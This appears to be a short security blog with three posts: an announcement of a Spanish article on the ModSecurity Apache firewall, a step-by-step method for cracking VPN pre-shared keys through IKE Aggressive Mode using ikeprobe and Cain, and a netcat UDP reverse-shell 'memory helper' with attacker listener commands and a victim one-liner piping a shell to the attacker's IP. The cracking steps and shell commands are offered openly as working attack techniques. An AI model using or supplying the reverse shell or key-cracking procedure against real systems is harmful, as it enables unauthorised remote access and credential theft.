ModSecurity: Application Firewall

I wrote an article about Modsecurity, an apache module that work as an application Firewall. The paper is written in Spanish because the lack of spanish documentation about it. I wrote it for a monthly publication for the company i work.

You can get it at:
HTML Version: http://www.isecauditors.com/es/iseclab4.html
PDF Version: http://www.isecauditors.com/downloads/artic/iseclab4.pdf

Enjoy

Ike Aggressive Mode Cracking

If you are doing a Pentest and you find a Vpn server there is a chance that it support Aggressive Mode, so what could we do?

1-Use Ikeprobe to check if the server support Aggressive Mode: ikeprobe ipserver
2-If we are lucky and there is a match, then we have to configure a vpn client (Safenet for example) with the information we have, we doesnt have the pre-shared key but doesnt matter, that is what we looking for.
3-Before firing up the vpn client, we have to put Cain to sniff the network traffic.
4-After the failed attempt Cain will have a sniffed the preshared key hash, now we send it to the Cain cracker.
5-And then we can launch Dictionary attack and if it fails, we can try brute force attack. We have to wait and wait... until the password is revealed.

That's all

Netcat Udp shell

Here is a little memory helper about the uses of Netcat, an udp shell.

On the attacker:
Terminal 1: nc -lun -p 4444
Terminal 2: nc -lun -p 5555

On the Victim:
echo""|nc -un ipattacker 4444 | nc -un ipattacker 5555

So you type the commands on the Terminal 1 and you receive the output on Terminal 2.
This also apply to tcp